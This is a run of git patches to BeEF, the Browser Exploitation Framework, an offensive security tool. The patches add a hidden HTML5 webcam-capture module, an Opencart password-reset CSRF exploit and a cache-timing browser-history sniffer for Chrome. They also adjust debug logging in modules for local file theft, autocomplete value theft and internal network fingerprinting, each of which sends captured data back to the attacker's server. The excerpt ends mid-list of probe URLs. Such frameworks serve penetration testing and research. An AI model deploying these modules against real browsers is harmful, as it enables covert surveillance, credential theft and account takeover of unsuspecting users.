             //NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited
             if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){
@@ -335,13 +335,13 @@ beef.execute(function () {
             var uri = "http://" + rhost + ":" + rport + path;
 
             xhr = new XMLHttpRequest();
-            console.log("uri: " + uri);
+            beef.debug("uri: " + uri);
             xhr.open("POST", uri, true);
             xhr.setRequestHeader("Content-Type", "text/plain");
 
             // this is required only with WebKit browsers.
             if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
-                console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+                beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
                 XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
                     function byteValue(x) {
                         return x.charCodeAt(0) & 0xff;
@@ -362,7 +362,7 @@ beef.execute(function () {
 
     log = function(data){
         beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
-        console.log(data);
+        beef.debug(data);
     };
 
 
diff --git a/modules/misc/local_file_theft/command.js b/modules/misc/local_file_theft/command.js
index 1cff957ef..d0cd40942 100644
--- a/modules/misc/local_file_theft/command.js
+++ b/modules/misc/local_file_theft/command.js
@@ -219,9 +219,9 @@ result = '';
     function grabFiles(dir,os){
 	    tmpfile = {}
 	    for (i in fileList[os]['post']){
-            console.log('dir = ' + dir);
-            console.log('fileList: ' + fileList[os]['post'][i]);
-		    console.log(i);
+            beef.debug('dir = ' + dir);
+            beef.debug('fileList: ' + fileList[os]['post'][i]);
+		    beef.debug(i);
 		    tmpfile[i] = new XMLHttpRequest()
 		    tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]);
 		    tmpfile[i].send();
@@ -229,7 +229,7 @@ result = '';
 		    tmpfile[i].onreadystatechange=function(){
                 for (j in fileList[os]['post']){
 			        if(tmpfile[j].readyState==4){
-                        console.log('new returned for: ' + j);
+                        beef.debug('new returned for: ' + j);
                         result = j +": "+ tmpfile[j].responseText;
                         
                         beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);
diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js
index 620defb23..476041a55 100644
--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -219,7 +219,7 @@ beef.execute(function() {
 		for(var u=0; u < urls.length; u++) {
 			if(!urls[u][3] && ports != null){ // use default port
 				var img = new Image;
-				//console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
+				//beef.debug("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
 				img.id  = u;
 				img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4];
 				img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
@@ -227,7 +227,7 @@ beef.execute(function() {
 			} else { // iterate to all the specified ports
 				for(p=0;p<ports.length;p++){
 					var img = new Image;
-					//console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
+					//beef.debug("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
 					img.id  = u;
 					img.src = urls[u][2]+"://"+ips[i]+":"+ports[p]+urls[u][4];
 					img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
diff --git a/modules/phonegap/phonegap_geo_locate/command.js b/modules/phonegap/phonegap_geo_locate/command.js
index c34389780..99f0ef075 100644
--- a/modules/phonegap/phonegap_geo_locate/command.js
+++ b/modules/phonegap/phonegap_geo_locate/command.js
@@ -27,7 +27,7 @@ beef.execute(function() {
     // onError Callback receives a PositionError object
     //
     function onError(error) {
-        console.log('code: '    + error.code    + '\n' +
+        beef.debug('code: '    + error.code    + '\n' +
           'message: ' + error.message + '\n');
     }
 
diff --git a/modules/phonegap/phonegap_persistence/command.js b/modules/phonegap/phonegap_persistence/command.js
index df520a17d..d15797a72 100644
--- a/modules/phonegap/phonegap_persistence/command.js
+++ b/modules/phonegap/phonegap_persistence/command.js
@@ -26,12 +26,12 @@ beef.execute(function() {
     function write_file(text) {
 
         function fail () {
-            console.log('write_file fail')
+            beef.debug('write_file fail')
         }
 
         function gotFileWriter(writer) {
             writer.onwrite = function(evt) {
-                console.log("write success");
+                beef.debug("write success");
             }
             writer.write(text);
         }
@@ -59,14 +59,14 @@ beef.execute(function() {
 
     function read_index(app_name) {
         function fail () {
-            console.log('read_index fail')
+            beef.debug('read_index fail')
         }
         
         function readFile(file) {
             var reader = new FileReader();
             reader.onloadend = function(evt) {
-                //console.log("Read as text");
-                console.log(evt.target.result);
+                //beef.debug("Read as text");
+                beef.debug(evt.target.result);
                 replace_text(evt.target.result);
             };
             reader.readAsText(file);    
@@ -86,14 +86,14 @@ beef.execute(function() {
     function locate() {
  
         function result(entries) {
-         console.log('result'); 
+         beef.debug('result'); 
           var i;
           for (i=0; i<entries.length; i++) {
              // looking for <something>.app
              var re = new RegExp(/^[a-zA-Z0-9]*\.app/)
              var match = re.exec(entries[i].name)
              if (match) {
-               console.log('found ' + entries[i].name);
+               beef.debug('found ' + entries[i].name);
                
                // look for ../<something>.app/www/index.html
                read_index(entries[i].name);
@@ -107,11 +107,11 @@ beef.execute(function() {
 
      
       function fail() {
-        console.log('fail');
+        beef.debug('fail');
       }
 
       function win(entries) {
-        console.log('win');
+        beef.debug('win');
         result(entries);
       }
 
diff --git a/modules/social_engineering/autocomplete_theft/command.js b/modules/social_engineering/autocomplete_theft/command.js
index ffcb1677c..d8b9ae639 100644
--- a/modules/social_engineering/autocomplete_theft/command.js
+++ b/modules/social_engineering/autocomplete_theft/command.js
@@ -44,7 +44,7 @@ beef.execute(function() {
 			var val = JSON.stringify({'input':n,'value':v});
 			if (v != "" && !inArray(val,results)){
 				results.push(val);
-				//console.log(val);
+				//beef.debug(val);
 				beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val);
 			}
 		}
diff --git a/modules/social_engineering/clippy/command.js b/modules/social_engineering/clippy/command.js
index 7d1878e32..1e635fbbc 100755
--- a/modules/social_engineering/clippy/command.js
+++ b/modules/social_engineering/clippy/command.js
@@ -291,7 +291,7 @@ Clippy.prototype.findHomeBase = function(selector) {
 	
 	}
 	
-	console.log(ref);
+	beef.debug(ref);
 	
 	return ref;
 }

From 6e9db43463ca77e43b990d5582a69bbd9aa4dd99 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Mon, 15 Apr 2013 19:18:07 +0800
Subject: [PATCH 272/397] Fixes issue #881. Console fix for reviewing previous
 responses

---
 .../console/lib/command_dispatcher/core.rb    | 21 +++++++++++++------
 1 file changed, 15 insertions(+), 6 deletions(-)

diff --git a/extensions/console/lib/command_dispatcher/core.rb b/extensions/console/lib/command_dispatcher/core.rb
index 15844da23..9aa4cd1ce 100644
--- a/extensions/console/lib/command_dispatcher/core.rb
+++ b/extensions/console/lib/command_dispatcher/core.rb
@@ -286,12 +286,21 @@ class Core
       offlinezombies << zombie.id
     end
     
-    if not offlinezombies.include?(args[0].to_i)
-      print_status("Browser does not appear to be offline..")
-      return false
-    end
+    targets = args[0].split(',')
+    targets.each {|t|
+        if not offlinezombies.include?(t.to_i)
+          print_status("Browser [id:"+t.to_s+"] does not appear to be offline.")
+          return false
+        end
+    #print_status("Adding browser [id:"+t.to_s+"] to target list.")
+    }
+
+    # if not offlinezombies.include?(args[0].to_i)
+    #   print_status("Browser does not appear to be offline..")
+    #   return false
+    # end
     
-    if not driver.interface.setofflinetarget(args[0]).nil?
+    if not driver.interface.setofflinetarget(targets).nil?
       if (driver.dispatcher_stack.size > 1 and
 	      driver.current_dispatcher.name != 'Core')
 	      driver.destack_dispatcher
@@ -302,7 +311,7 @@ class Core
       if driver.interface.targetid.length > 1
         driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ")
       else
-        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ")
+        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ")
       end
     end  
     

From e3cb7f7a2db05141cd92960a8a3b810d04b6d9c8 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Mon, 15 Apr 2013 19:20:48 +0800
Subject: [PATCH 273/397] #882. New HTML5 WebRTC Webcam Module

---
 modules/browser/webcam_html5/command.js  | 50 ++++++++++++++++++++++++
 modules/browser/webcam_html5/config.yaml | 16 ++++++++
 modules/browser/webcam_html5/module.rb   | 16 ++++++++
 3 files changed, 82 insertions(+)
 create mode 100644 modules/browser/webcam_html5/command.js
 create mode 100644 modules/browser/webcam_html5/config.yaml
 create mode 100644 modules/browser/webcam_html5/module.rb

diff --git a/modules/browser/webcam_html5/command.js b/modules/browser/webcam_html5/command.js
new file mode 100644
index 000000000..1c5dd24a8
--- /dev/null
+++ b/modules/browser/webcam_html5/command.js
@@ -0,0 +1,50 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+
+beef.execute(function() {
+    var vid_id = beef.dom.generateID();
+    var can_id = beef.dom.generateID();
+    var vid_el = beef.dom.createElement('video',{'id':vid_id,'style':'display:none;','autoplay':'true'});
+    var can_el = beef.dom.createElement('canvas',{'id':can_id,'style':'display:none;','width':'640','height':'480'});
+    $j('body').append(vid_el);
+    $j('body').append(can_el);
+
+    var ctx = can_el.getContext('2d');
+
+    var localMediaStream = null;
+
+    var cap = function() {
+        if (localMediaStream) {
+            ctx.drawImage(vid_el,0,0);
+            beef.net.send("<%= @command_url %>",<%= @command_id %>, 'image='+can_el.toDataURL('image/png'));
+        } else {
+            beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong');
+        }
+    }
+
+    window.URL = window.URL || window.webkitURL;
+    navigator.getUserMedia  = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia;
+
+    navigator.getUserMedia({video:true},function(stream) {
+        vid_el.src = window.URL.createObjectURL(stream);
+        localMediaStream = stream;
+        setTimeout(cap,2000);
+
+    }, function(err) {
+        beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia call failed');
+    });
+
+
+
+
+});
+
+
+
+
+
diff --git a/modules/browser/webcam_html5/config.yaml b/modules/browser/webcam_html5/config.yaml
new file mode 100644
index 000000000..fd6762121
--- /dev/null
+++ b/modules/browser/webcam_html5/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        webcam_html5:
+            enable: true
+            category: "Browser"
+            name: "Webcam HTML5"
+            description: "This module will leverage HTML5s WebRTC to capture webcam images. Only tested in Chrome, and it will display a dialog to ask if the user wants to enable their webcam."
+            authors: ["xntrik"]
+            target:
+                 user_notify: ["C"]
+                 unknown: ["All"]
diff --git a/modules/browser/webcam_html5/module.rb b/modules/browser/webcam_html5/module.rb
new file mode 100644
index 000000000..78794cc3f
--- /dev/null
+++ b/modules/browser/webcam_html5/module.rb
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+require 'base64'
+class Webcam_html5 < BeEF::Core::Command
+  
+	def post_execute 
+		content = {}
+		content["result"] = @datastore["result"] if not @datastore["result"].nil?
+    content["image"] = @datastore["image"] if not @datastore["image"].nil?
+		save content
+	end
+
+end

From 6e0f7a266edb9fe4b2ca0edd1fe400a74390df77 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Mon, 15 Apr 2013 19:28:52 +0800
Subject: [PATCH 274/397] Issue #883. Admin UI will inline display images from
 the HTML5 webcam module now

---
 .../admin_ui/media/javascript/ui/panel/common.js       | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/common.js b/extensions/admin_ui/media/javascript/ui/panel/common.js
index 5fc4e536a..1727e17b8 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/common.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/common.js
@@ -251,8 +251,14 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 							for(index in record.data.data) {
 								result = record.data.data[index];
 								index = index.toString().replace('_', ' ');
-                                //output escape everything, but allow the <br> tag for better rendering.
-								html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
+								//Check if the data is the image parameter and that it's a base64 encoded png.
+                                if ($jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>').substring(0,28) == "image=data:image/png;base64,") {
+                                	//Lets display the image. // Does this introduce issues? Or, does the encoding keep this sound?
+                                	html += String.format('<img src="{0}" /><br>', $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>').substring(6));
+                                } else {
+	                                //output escape everything, but allow the <br> tag for better rendering.
+									html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
+								}
 							}
 							
 							html += '</p>';

From 4980ca02a6326806046f869ed5a504e18009389e Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 17 Apr 2013 22:05:31 +0930
Subject: [PATCH 275/397] Add `beef.client.debug` config property - Part of
 issue #862

Client-side debugging is disabled by default

`beef.debug()` now only shows messages if `beef.client.debug` is true
---
 config.yaml              |  4 ++++
 core/main/client/beef.js |  1 +
 core/main/server.rb      | 17 +++++++++--------
 3 files changed, 14 insertions(+), 8 deletions(-)

diff --git a/config.yaml b/config.yaml
index cc78202bb..a78a872a8 100644
--- a/config.yaml
+++ b/config.yaml
@@ -91,6 +91,10 @@ beef:
 
     crypto_default_value_length: 80
 
+    # Enable client-side debugging
+    client:
+        debug: false
+
     # You may override default extension configuration parameters here
     extension:
         requester:
diff --git a/core/main/client/beef.js b/core/main/client/beef.js
index 14f39e2a0..f2f64f928 100644
--- a/core/main/client/beef.js
+++ b/core/main/client/beef.js
@@ -37,6 +37,7 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
                  * @param: {string} the debug string to return
                  */
                 debug: function(msg) {
+                    if (!<%= @client_debug %>) return;
                     if (typeof console == "object" && typeof console.log == "function") {
                         console.log(msg);
                     } else {
diff --git a/core/main/server.rb b/core/main/server.rb
index 51bb3613a..fc9389042 100644
--- a/core/main/server.rb
+++ b/core/main/server.rb
@@ -34,16 +34,17 @@ module BeEF
 
       def to_h
         {
-            'beef_version' => VERSION,
-            'beef_url' => @url,
+            'beef_version'  => VERSION,
+            'beef_url'      => @url,
             'beef_root_dir' => @root_dir,
-            'beef_host' => @configuration.get('beef.http.host'),
-            'beef_port' => @configuration.get('beef.http.port'),
-            'beef_public' => @configuration.get('beef.http.public'),
+            'beef_host'     => @configuration.get('beef.http.host'),
+            'beef_port'     => @configuration.get('beef.http.port'),
+            'beef_public'   => @configuration.get('beef.http.public'),
             'beef_public_port' => @configuration.get('beef.http.public_port'),
-            'beef_dns' => @configuration.get('beef.http.dns'),
-            'beef_hook' => @configuration.get('beef.http.hook_file'),
-            'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http"
+            'beef_dns'      => @configuration.get('beef.http.dns'),
+            'beef_hook'     => @configuration.get('beef.http.hook_file'),
+            'beef_proto'    => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
+            'client_debug'  => @configuration.get("beef.client.debug")
         }
       end
 

From da763df110648722af8103a501e6baab43c007d0 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 17 Apr 2013 22:12:35 +0930
Subject: [PATCH 276/397] Uncommented several instances of `beef.debug()` -
 Part of issue #862

---
 core/main/client/browser.js                            |  4 ++--
 core/main/client/geolocation.js                        | 10 +++++-----
 core/main/client/net/dns.js                            |  2 +-
 .../network/internal_network_fingerprinting/command.js |  4 ++--
 .../social_engineering/autocomplete_theft/command.js   |  2 +-
 5 files changed, 11 insertions(+), 11 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index ed83764ca..a63859b3b 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -871,10 +871,10 @@ beef.browser = {
             try {
                 // append hook script
                 self.frames[i].document.body.appendChild(script);
-                //beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
+                beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
             } catch (e) {
                 // warn on cross-domain
-                //beef.debug("Hooking frame failed");
+                beef.debug("Hooking frame failed");
             }
         }
     },
diff --git a/core/main/client/geolocation.js b/core/main/client/geolocation.js
index 3347bdbc2..4b9970c15 100644
--- a/core/main/client/geolocation.js
+++ b/core/main/client/geolocation.js
@@ -32,14 +32,14 @@ beef.geolocation = {
 
         $j.ajax({
             error: function(xhr, status, error){
-                //beef.debug("[geolocation.js] openstreetmap error");
+                beef.debug("[geolocation.js] openstreetmap error");
                 beef.net.send(command_url, command_id, "latitude=" + latitude
                              + "&longitude=" + longitude
                              + "&osm=UNAVAILABLE"
                              + "&geoLocEnabled=True");
                 },
             success: function(data, status, xhr){
-                //beef.debug("[geolocation.js] openstreetmap success");
+                beef.debug("[geolocation.js] openstreetmap success");
                 var jsonResp = $j.parseJSON(data);
 
                 beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
 	        beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");	
 			return;
 		}
-        //beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
+        beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
         navigator.geolocation.getCurrentPosition( //note: this is an async call
 			function(position){ // success
 				var latitude = position.coords.latitude;
         		var longitude = position.coords.longitude;
-                //beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
+                beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
                 beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
 
 			}, function(error){ // failure
-                    //beef.debug("[geolocation.js] error [%d] getting position", error.code);
+                    beef.debug("[geolocation.js] error [%d] getting position", error.code);
 					switch(error.code) // Returns 0-3
 					{
 						case 0:
diff --git a/core/main/client/net/dns.js b/core/main/client/net/dns.js
index 7955198c2..d3b536c9a 100644
--- a/core/main/client/net/dns.js
+++ b/core/main/client/net/dns.js
@@ -43,7 +43,7 @@ beef.net.dns = {
 
 		// sends a DNS request
 		sendQuery = function(query) {
-			//beef.debug("Requesting: "+query);
+			beef.debug("Requesting: "+query);
 			var img = new Image;
 			img.src = "http://"+query;
 			img.onload = function() { dom.removeChild(this); }
diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js
index 476041a55..8d4f1f85d 100644
--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -219,7 +219,7 @@ beef.execute(function() {
 		for(var u=0; u < urls.length; u++) {
 			if(!urls[u][3] && ports != null){ // use default port
 				var img = new Image;
-				//beef.debug("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
+				beef.debug("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
 				img.id  = u;
 				img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4];
 				img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
@@ -227,7 +227,7 @@ beef.execute(function() {
 			} else { // iterate to all the specified ports
 				for(p=0;p<ports.length;p++){
 					var img = new Image;
-					//beef.debug("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
+					beef.debug("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
 					img.id  = u;
 					img.src = urls[u][2]+"://"+ips[i]+":"+ports[p]+urls[u][4];
 					img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
diff --git a/modules/social_engineering/autocomplete_theft/command.js b/modules/social_engineering/autocomplete_theft/command.js
index d8b9ae639..7527b72a8 100644
--- a/modules/social_engineering/autocomplete_theft/command.js
+++ b/modules/social_engineering/autocomplete_theft/command.js
@@ -44,7 +44,7 @@ beef.execute(function() {
 			var val = JSON.stringify({'input':n,'value':v});
 			if (v != "" && !inArray(val,results)){
 				results.push(val);
-				//beef.debug(val);
+				beef.debug("[Module - autocomplete_theft] Found saved string: '" + val + "'");
 				beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val);
 			}
 		}

From 59951959f18568b2dec4a22933cd7e0d4557da85 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 19 Apr 2013 09:18:05 +0930
Subject: [PATCH 277/397] Add Opencart password reset CSRF module

This module hasn't been tested against an Opencart instance
---
 .../opencart_reset_password/command.js        | 24 +++++++++++++++++++
 .../opencart_reset_password/config.yaml       | 15 ++++++++++++
 .../opencart_reset_password/module.rb         | 20 ++++++++++++++++
 3 files changed, 59 insertions(+)
 create mode 100644 modules/exploits/opencart_reset_password/command.js
 create mode 100644 modules/exploits/opencart_reset_password/config.yaml
 create mode 100644 modules/exploits/opencart_reset_password/module.rb

diff --git a/modules/exploits/opencart_reset_password/command.js b/modules/exploits/opencart_reset_password/command.js
new file mode 100644
index 000000000..54747a048
--- /dev/null
+++ b/modules/exploits/opencart_reset_password/command.js
@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var base     = '<%= @base %>'; 
+  var password = '<%= @password %>';
+
+  var opencart_reset_password_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+    {'type':'hidden', 'name':'password', 'value':password},
+    {'type':'hidden', 'name':'confirm',  'value':password}
+  ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(opencart_reset_password_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/opencart_reset_password/config.yaml b/modules/exploits/opencart_reset_password/config.yaml
new file mode 100644
index 000000000..16ccacece
--- /dev/null
+++ b/modules/exploits/opencart_reset_password/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        opencart_reset_password:
+            enable: true
+            category: "Exploits"
+            name: "Opencart Reset Password CSRF"
+            description: "Attempts to reset an Opencart user's password."
+            authors: ["Saadat Ullah", "bcoles"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/opencart_reset_password/module.rb b/modules/exploits/opencart_reset_password/module.rb
new file mode 100644
index 000000000..569c2bc2c
--- /dev/null
+++ b/modules/exploits/opencart_reset_password/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# This module has not been tested
+class Opencart_reset_password < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{ 'name' => 'base', 'ui_label' => 'Opencart path', 'value' => 'http://example.com/index.php?route=account/password'},
+			{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'beefbeef'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

From c16479a14e6c883c6638a2d280547f784787742c Mon Sep 17 00:00:00 2001
From: qswain2 <qswain2@gmail.com>
Date: Fri, 19 Apr 2013 00:53:26 -0400
Subject: [PATCH 278/397]  Add chrome support to get_visited_domains

Added chrme implementation based on visipisi
---
 .../browser/get_visited_domains/command.js    | 147 ++++++++++++++++--
 .../browser/get_visited_domains/config.yaml   |   2 +-
 2 files changed, 138 insertions(+), 11 deletions(-)

diff --git a/modules/browser/get_visited_domains/command.js b/modules/browser/get_visited_domains/command.js
index 29fa1500f..917135e33 100644
--- a/modules/browser/get_visited_domains/command.js
+++ b/modules/browser/get_visited_domains/command.js
@@ -133,7 +133,7 @@ if (beef.browser.isIE() == 1) {
 	var MAX_ATTEMPTS = 1;	
 }
 
-if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+if (beef.browser.isO() == 1){
     /****************
 	 * SCANNED URLS *
 	 ****************/
@@ -212,7 +212,7 @@ function perform_check() {
   if (beef.browser.isFF() == 1) {
   	setTimeout(wait_for_read, 1);
   }
-  if(beef.browser.isC() == 1 || beef.browser.isO() == 1){
+  if(beef.browser.isO() == 1){
     setTimeout(wait_for_read, 1);
   } 
 }
@@ -242,11 +242,10 @@ function wait_for_read() {
 		setTimeout(wait_for_read, 0);
 	  }	
    }
-   if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+   if (beef.browser.isO() == 1){
       try{
-        if(frames['f'].location.href != 'about:blank'){ 
-            throw 1;
-        }
+		
+        if(frames['f'].location.href != 'about:blank') throw 1;
         
         frames['f'].stop();
         document.getElementById('f').src = 'javascript:"<body onload=\'parent.frame_ready = true\'>"';
@@ -280,7 +279,7 @@ function navigate_to_target() {
   if (beef.browser.isIE() == 1) {
 	  setTimeout(wait_for_noread, 0);
   }
-  if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+  if (beef.browser.isO() == 1){
       setTimeout(wait_for_noread, 1);
   }
   urls++;
@@ -318,7 +317,7 @@ function wait_for_noread() {
     	}	
     	sched_call(wait_for_noread);    	
 	}
-    if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
+    if (beef.browser.isO() == 1){
        if (frames['f'].location.href == undefined){
            confirm_visited = true;
            throw 1;
@@ -343,7 +342,7 @@ function maybe_test_next() {
   if (beef.browser.isIE() == 1) {
   	   document.getElementById("f").src = 'about:blank';
   }
-  if (beef.browser.isC() == 1 || beef.browser.isO() == 1) {
+  if (beef.browser.isO() == 1) {
       document.getElementById('f').src = 'about:blank';
   }
   if (target_off < targets.length) {
@@ -396,7 +395,7 @@ function reload(){
 /* The handler for "run the test" button on the main page. Dispenses
    advice, resets state if necessary. */
 function start_stuff() {
-  if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isC() == 1 || beef.browser.isO() == 1) {
+  if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isO() == 1) {
   	  target_off = 0;
 	  attempt = 0;
 	  confirmed_visited = false;
@@ -409,11 +408,139 @@ function start_stuff() {
   }  
 }
 
+/**************/
+/***Visipisi***/
+/**************/
+var vp_result = {};
+
+var visipisi = {
+  webkit: function(url, cb) {
+    var start;
+    var loaded = false;
+    var runtest = function() {
+      window.removeEventListener("message", runtest, false);
+      var img = new Image();
+      start = new Date().getTime();
+      try{
+      img.src = url;
+      } catch(e) {}
+      var messageCB = function (e){
+      var now = new Date().getTime();
+          if (img.complete) {
+            delete img;
+            window.removeEventListener("message", messageCB, false);
+            cbWrap(true);
+          } else if (now - start > 10) {
+            delete img;
+	    if (window.stop !== undefined)
+		window.stop();
+            else
+		document.execCommand("Stop",false);
+            window.removeEventListener("message", messageCB, false);
+            cbWrap(false);
+        } else {
+          window.postMessage('','*');
+      	}
+
+    };
+    window.addEventListener("message", messageCB, false);
+    window.postMessage('','*');
+  };
+  cbWrap = function (value) {cb(value);};
+  window.addEventListener("message", runtest, false);
+  window.postMessage('','*');
+  }
+};
+
+function visipisiCB(vp, endCB, sites, urls, site, result){
+    if(result === null){
+	vp_result[site] = 'Whoops';
+     }
+     else{	
+	vp_result[site] = result ? 'visited' : 'not visited';
+     }
+     var next_site = sites.pop();
+     if(next_site)
+	vp( urls[next_site], function (result) { 
+	  visipisiCB(vp, endCB, sites, urls, next_site, result);
+	});
+      else
+	endCB();
+}
+
+function getVisitedDomains(){
+    var tests = {
+	facebook: 'https://s-static.ak.facebook.com/rsrc.php/v1/yJ/r/vOykDL15P0R.png',
+	twitter: 'https://twitter.com/images/spinner.gif',
+	digg: 'http://cdn2.diggstatic.com/img/sprites/global.5b25823e.png',
+	reddit: 'http://www.redditstatic.com/sprite-reddit.pZL22qP4ous.png',
+	hn: 'http://ycombinator.com/images/y18.gif',
+	stumbleupon: 'http://cdn.stumble-upon.com/i/bg/logo_su.png',
+	wired: 'http://www.wired.com/images/home/wired_logo.gif',
+	xkcd: 'http://imgs.xkcd.com/s/9be30a7.png',
+	linkedin: 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
